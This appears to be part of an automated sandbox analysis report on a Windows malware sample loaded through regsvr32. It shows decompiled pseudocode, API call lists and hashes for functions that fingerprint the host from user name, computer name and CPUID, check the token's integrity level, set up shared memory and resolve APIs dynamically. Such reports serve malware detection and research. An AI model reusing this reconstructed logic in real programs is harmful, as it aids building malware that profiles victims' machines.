                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1724014008-0
                                                                                                                                                                                                                                    • Opcode ID: 23b2667fd7d585ac3d170156684780b28780a1f221e7550d1bd8462bc4890a8c
                                                                                                                                                                                                                                    • Instruction ID: f1243f7bc7c95489a95ad3467ea922539c79e8462c40d084f26d3ad1bac589d6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23b2667fd7d585ac3d170156684780b28780a1f221e7550d1bd8462bc4890a8c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91210672E4018CBFC710AFA8DC84EEE77A9EB48344F9040A5F619E7280DB7099958B71
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E1B2F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                    			E023E1B2F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L023EB0C2();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x23ed27c; // 0x28da5a8
				_t5 = _t13 + 0x23ee862; // 0x4cc8e0a
				_t6 = _t13 + 0x23ee59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L023EAD5A();
				_t17 = CreateFileMappingW(0xffffffff, 0x23ed2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                                                                                                                                                                                                    0x023e1b2f
                                                                                                                                                                                                                                    0x023e1b37
                                                                                                                                                                                                                                    0x023e1b3b
                                                                                                                                                                                                                                    0x023e1b41
                                                                                                                                                                                                                                    0x023e1b46
                                                                                                                                                                                                                                    0x023e1b4b
                                                                                                                                                                                                                                    0x023e1b4e
                                                                                                                                                                                                                                    0x023e1b51
                                                                                                                                                                                                                                    0x023e1b56
                                                                                                                                                                                                                                    0x023e1b57
                                                                                                                                                                                                                                    0x023e1b5a
                                                                                                                                                                                                                                    0x023e1b5f
                                                                                                                                                                                                                                    0x023e1b66
                                                                                                                                                                                                                                    0x023e1b70
                                                                                                                                                                                                                                    0x023e1b72
                                                                                                                                                                                                                                    0x023e1b73
                                                                                                                                                                                                                                    0x023e1b76
                                                                                                                                                                                                                                    0x023e1b92
                                                                                                                                                                                                                                    0x023e1b98
                                                                                                                                                                                                                                    0x023e1b9c
                                                                                                                                                                                                                                    0x023e1bea
                                                                                                                                                                                                                                    0x023e1b9e
                                                                                                                                                                                                                                    0x023e1bab
                                                                                                                                                                                                                                    0x023e1bbb
                                                                                                                                                                                                                                    0x023e1bc3
                                                                                                                                                                                                                                    0x023e1bd5
                                                                                                                                                                                                                                    0x023e1bd9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e1bc5
                                                                                                                                                                                                                                    0x023e1bc8
                                                                                                                                                                                                                                    0x023e1bcd
                                                                                                                                                                                                                                    0x023e1bcf
                                                                                                                                                                                                                                    0x023e1bcf
                                                                                                                                                                                                                                    0x023e1bad
                                                                                                                                                                                                                                    0x023e1baf
                                                                                                                                                                                                                                    0x023e1bdb
                                                                                                                                                                                                                                    0x023e1bdc
                                                                                                                                                                                                                                    0x023e1bdc
                                                                                                                                                                                                                                    0x023e1bab
                                                                                                                                                                                                                                    0x023e1bf1

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,023E22EA,?,?,4D283A53,?,?), ref: 023E1B3B
                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 023E1B51
                                                                                                                                                                                                                                    • _snwprintf.NTDLL ref: 023E1B76
                                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,023ED2A8,00000004,00000000,00001000,?), ref: 023E1B92
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,023E22EA,?,?,4D283A53), ref: 023E1BA4
                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 023E1BBB
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,023E22EA,?,?), ref: 023E1BDC
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,023E22EA,?,?,4D283A53), ref: 023E1BE4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1814172918-0
                                                                                                                                                                                                                                    • Opcode ID: 0883974953bcd3ccfa0bac734d91d9b52e65b811efd1824a82607a933abf2395
                                                                                                                                                                                                                                    • Instruction ID: 74d485c8a5a1d2ec4118045f2dc772722b9c3c7789d1544bf0be031e66a069cb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0883974953bcd3ccfa0bac734d91d9b52e65b811efd1824a82607a933abf2395
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6921A4B6A40218FBDF359BA8CC05F8E77ADAB44750F114552F51AEA2C1E770EE08CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E269C, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 183 23e269c-23e26b0 184 23e26ba-23e26cc call 23e6b43 183->184 185 23e26b2-23e26b7 183->185 188 23e26ce-23e26de GetUserNameW 184->188 189 23e2720-23e272d 184->189 185->184 190 23e272f-23e2746 GetComputerNameW 188->190 191 23e26e0-23e26f0 RtlAllocateHeap 188->191 189->190 192 23e2748-23e2759 RtlAllocateHeap 190->192 193 23e2784-23e27a6 190->193 191->190 194 23e26f2-23e26ff GetUserNameW 191->194 192->193 195 23e275b-23e2764 GetComputerNameW 192->195 196 23e270f-23e271e HeapFree 194->196 197 23e2701-23e270d call 23e2496 194->197 198 23e2766-23e2772 call 23e2496 195->198 199 23e2775-23e277e HeapFree 195->199 196->190 197->196 198->199 199->193
                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                    			E023E269C(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x23ed270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E023E6B43( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x23ed278 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x23ed238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E023E2496(_v8 + _v8, _t63);
							}
							HeapFree( *0x23ed238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x23ed238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E023E2496(_v8 + _v8, _t63);
						}
						HeapFree( *0x23ed238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                                                                                                                                                                                                                                    0x023e269c
                                                                                                                                                                                                                                    0x023e26a4
                                                                                                                                                                                                                                    0x023e26aa
                                                                                                                                                                                                                                    0x023e26ad
                                                                                                                                                                                                                                    0x023e26b0
                                                                                                                                                                                                                                    0x023e26b2
                                                                                                                                                                                                                                    0x023e26b7
                                                                                                                                                                                                                                    0x023e26b7
                                                                                                                                                                                                                                    0x023e26bd
                                                                                                                                                                                                                                    0x023e26bf
                                                                                                                                                                                                                                    0x023e26cc
                                                                                                                                                                                                                                    0x023e272d
                                                                                                                                                                                                                                    0x023e26ce
                                                                                                                                                                                                                                    0x023e26d3
                                                                                                                                                                                                                                    0x023e26d9
                                                                                                                                                                                                                                    0x023e26de
                                                                                                                                                                                                                                    0x023e26ec
                                                                                                                                                                                                                                    0x023e26f0
                                                                                                                                                                                                                                    0x023e26ff
                                                                                                                                                                                                                                    0x023e2706
                                                                                                                                                                                                                                    0x023e270d
                                                                                                                                                                                                                                    0x023e270d
                                                                                                                                                                                                                                    0x023e2718
                                                                                                                                                                                                                                    0x023e2718
                                                                                                                                                                                                                                    0x023e26f0
                                                                                                                                                                                                                                    0x023e26de
                                                                                                                                                                                                                                    0x023e272f
                                                                                                                                                                                                                                    0x023e2735
                                                                                                                                                                                                                                    0x023e273f
                                                                                                                                                                                                                                    0x023e2741
                                                                                                                                                                                                                                    0x023e2746
                                                                                                                                                                                                                                    0x023e2755
                                                                                                                                                                                                                                    0x023e2759
                                                                                                                                                                                                                                    0x023e2764
                                                                                                                                                                                                                                    0x023e276b
                                                                                                                                                                                                                                    0x023e2772
                                                                                                                                                                                                                                    0x023e2772
                                                                                                                                                                                                                                    0x023e277e
                                                                                                                                                                                                                                    0x023e277e
                                                                                                                                                                                                                                    0x023e2759
                                                                                                                                                                                                                                    0x023e2787
                                                                                                                                                                                                                                    0x023e2789
                                                                                                                                                                                                                                    0x023e278c
                                                                                                                                                                                                                                    0x023e278e
                                                                                                                                                                                                                                    0x023e2791
                                                                                                                                                                                                                                    0x023e2794
                                                                                                                                                                                                                                    0x023e279e
                                                                                                                                                                                                                                    0x023e27a2
                                                                                                                                                                                                                                    0x023e27a6

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,?), ref: 023E26D3
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 023E26EA
                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,?), ref: 023E26F7
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,023E23D9), ref: 023E2718
                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 023E273F
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 023E2753
                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 023E2760
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,023E23D9), ref: 023E277E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3239747167-0
                                                                                                                                                                                                                                    • Opcode ID: acd8223239fc4f40963a1a1ab600af1aeb99d99046c2c5b95131d22676e8bf91
                                                                                                                                                                                                                                    • Instruction ID: ad2849ecc76eed9fefae63795b1e717372afb59d3819a96473c3ad0128ab8fa1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: acd8223239fc4f40963a1a1ab600af1aeb99d99046c2c5b95131d22676e8bf91
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44310CB2A5020AEFDF21DF65D881A6EB7FDEF44300F144829E805DB291DB70ED598B10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E924F, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E924F(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x23ed25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E023E2049(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E023E9039(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                                                                                                                                                                                                    0x023e925c
                                                                                                                                                                                                                                    0x023e9263
                                                                                                                                                                                                                                    0x023e926a
                                                                                                                                                                                                                                    0x023e927e
                                                                                                                                                                                                                                    0x023e9289
                                                                                                                                                                                                                                    0x023e92a1
                                                                                                                                                                                                                                    0x023e92ae
                                                                                                                                                                                                                                    0x023e92b1
                                                                                                                                                                                                                                    0x023e92b6
                                                                                                                                                                                                                                    0x023e92c1
                                                                                                                                                                                                                                    0x023e92c5
                                                                                                                                                                                                                                    0x023e92d4
                                                                                                                                                                                                                                    0x023e92d8
                                                                                                                                                                                                                                    0x023e92f4
                                                                                                                                                                                                                                    0x023e92f4
                                                                                                                                                                                                                                    0x023e92f8
                                                                                                                                                                                                                                    0x023e92f8
                                                                                                                                                                                                                                    0x023e92fd
                                                                                                                                                                                                                                    0x023e9301
                                                                                                                                                                                                                                    0x023e9307
                                                                                                                                                                                                                                    0x023e9308
                                                                                                                                                                                                                                    0x023e930f
                                                                                                                                                                                                                                    0x023e9315

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 023E9281
                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 023E92A1
                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 023E92B1
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 023E9301
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 023E92D4
                                                                                                                                                                                                                                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 023E92DC
                                                                                                                                                                                                                                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 023E92EC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1295030180-0
                                                                                                                                                                                                                                    • Opcode ID: dbed3c85313098e2919d73ce816faebe3c98b31c72a4a0e742e2cfda4896273e
                                                                                                                                                                                                                                    • Instruction ID: f3bfe80cd2520e2029649a5e334222b76a7a8bed6f0dadcd0db3bd6f8baf0fc7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbed3c85313098e2919d73ce816faebe3c98b31c72a4a0e742e2cfda4896273e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C52119B590021DFFEF219F94DC84EAEBB7DEB48304F000466E911A6190C7719E19EB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E163F, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 230 23e163f-23e168b SysAllocString 231 23e17af-23e17b2 230->231 232 23e1691-23e16bd 230->232 233 23e17bd-23e17c0 231->233 234 23e17b4-23e17b7 SafeArrayDestroy 231->234 238 23e17ac 232->238 239 23e16c3-23e16cf call 23e2436 232->239 236 23e17cb-23e17d2 233->236 237 23e17c2-23e17c5 SysFreeString 233->237 234->233 237->236 238->231 239->238 242 23e16d5-23e16e5 239->242 242->238 244 23e16eb-23e1711 IUnknown_QueryInterface_Proxy 242->244 244->238 246 23e1717-23e172b 244->246 248 23e172d-23e1730 246->248 249 23e1769-23e176c 246->249 248->249 250 23e1732-23e1749 StrStrIW 248->250 251 23e176e-23e1773 249->251 252 23e17a3-23e17a8 249->252 253 23e174b-23e1754 call 23e52f9 250->253 254 23e1760-23e1763 SysFreeString 250->254 251->252 255 23e1775-23e1780 call 23e1a70 251->255 252->238 253->254 261 23e1756-23e175e call 23e2436 253->261 254->249 258 23e1785-23e1789 255->258 258->252 260 23e178b-23e1790 258->260 262 23e179e 260->262 263 23e1792-23e179c 260->263 261->254 262->252 263->252
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 023E1680
                                                                                                                                                                                                                                    • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 023E1702
                                                                                                                                                                                                                                    • StrStrIW.SHLWAPI(?,006E0069), ref: 023E1741
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 023E1763
                                                                                                                                                                                                                                      • Part of subcall function 023E52F9: SysAllocString.OLEAUT32(023EC2B0), ref: 023E5349
                                                                                                                                                                                                                                    • SafeArrayDestroy.OLEAUT32(?), ref: 023E17B7
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 023E17C5
                                                                                                                                                                                                                                      • Part of subcall function 023E2436: Sleep.KERNELBASE(000001F4), ref: 023E247E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2118684380-0
                                                                                                                                                                                                                                    • Opcode ID: dee7d28f7ca5baf9320087475702dfc283b1c8051f5d2dd5138dc859ddaada13
                                                                                                                                                                                                                                    • Instruction ID: 99131b32fab9b48b8ac5d1526e1d2fcc14f0cc8ec6e3db7dff310fdfc6d656b4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dee7d28f7ca5baf9320087475702dfc283b1c8051f5d2dd5138dc859ddaada13
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85514176900219EFCF10DFE8C8848AEB7BAFF88744B158829E546EB250D731AD49CF51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 026D1A0F, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 266 26d1a0f-26d1a21 call 26d1de1 269 26d1a27-26d1a5c GetModuleHandleA GetProcAddress 266->269 270 26d1ae2 266->270 272 26d1a5e-26d1a72 GetProcAddress 269->272 273 26d1ada-26d1ae0 call 26d1dfc 269->273 271 26d1ae9-26d1af0 270->271 272->273 275 26d1a74-26d1a88 GetProcAddress 272->275 273->271 275->273 276 26d1a8a-26d1a9e GetProcAddress 275->276 276->273 278 26d1aa0-26d1ab4 GetProcAddress 276->278 278->273 279 26d1ab6-26d1ac7 call 26d1eb5 278->279 281 26d1acc-26d1ad1 279->281 281->273 282 26d1ad3-26d1ad8 281->282 282->271
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E026D1A0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E026D1DE1(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x26d4150 + 0x26d5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x26d4150 + 0x26d5151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E026D1DFC(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x26d4150 + 0x26d5161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x26d4150 + 0x26d5174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x26d4150 + 0x26d5189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x26d4150 + 0x26d519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E026D1EB5(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                                                                                                                                    0x026d1a1d
                                                                                                                                                                                                                                    0x026d1a21
                                                                                                                                                                                                                                    0x026d1ae2
                                                                                                                                                                                                                                    0x026d1a27
                                                                                                                                                                                                                                    0x026d1a3f
                                                                                                                                                                                                                                    0x026d1a4e
                                                                                                                                                                                                                                    0x026d1a55
                                                                                                                                                                                                                                    0x026d1a59
                                                                                                                                                                                                                                    0x026d1a5c
                                                                                                                                                                                                                                    0x026d1ada
                                                                                                                                                                                                                                    0x026d1adb
                                                                                                                                                                                                                                    0x026d1a5e
                                                                                                                                                                                                                                    0x026d1a6b
                                                                                                                                                                                                                                    0x026d1a6f
                                                                                                                                                                                                                                    0x026d1a72
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d1a74
                                                                                                                                                                                                                                    0x026d1a81
                                                                                                                                                                                                                                    0x026d1a85
                                                                                                                                                                                                                                    0x026d1a88
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d1a8a
                                                                                                                                                                                                                                    0x026d1a97
                                                                                                                                                                                                                                    0x026d1a9b
                                                                                                                                                                                                                                    0x026d1a9e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d1aa0
                                                                                                                                                                                                                                    0x026d1aad
                                                                                                                                                                                                                                    0x026d1ab1
                                                                                                                                                                                                                                    0x026d1ab4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d1ab6
                                                                                                                                                                                                                                    0x026d1abc
                                                                                                                                                                                                                                    0x026d1ac2
                                                                                                                                                                                                                                    0x026d1ac7
                                                                                                                                                                                                                                    0x026d1ace
                                                                                                                                                                                                                                    0x026d1ad1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d1ad3
                                                                                                                                                                                                                                    0x026d1ad6
                                                                                                                                                                                                                                    0x026d1ad6
                                                                                                                                                                                                                                    0x026d1ad1
                                                                                                                                                                                                                                    0x026d1ab4
                                                                                                                                                                                                                                    0x026d1a9e
                                                                                                                                                                                                                                    0x026d1a88
                                                                                                                                                                                                                                    0x026d1a72
                                                                                                                                                                                                                                    0x026d1a5c
                                                                                                                                                                                                                                    0x026d1af0

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 026D1DE1: HeapAlloc.KERNEL32(00000000,?,026D1556,00000208,00000000,00000000,?,?,?,026D16A9,?), ref: 026D1DED
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,026D1E4D,?,?,?,?,?,00000002,?,026D1401), ref: 026D1A33
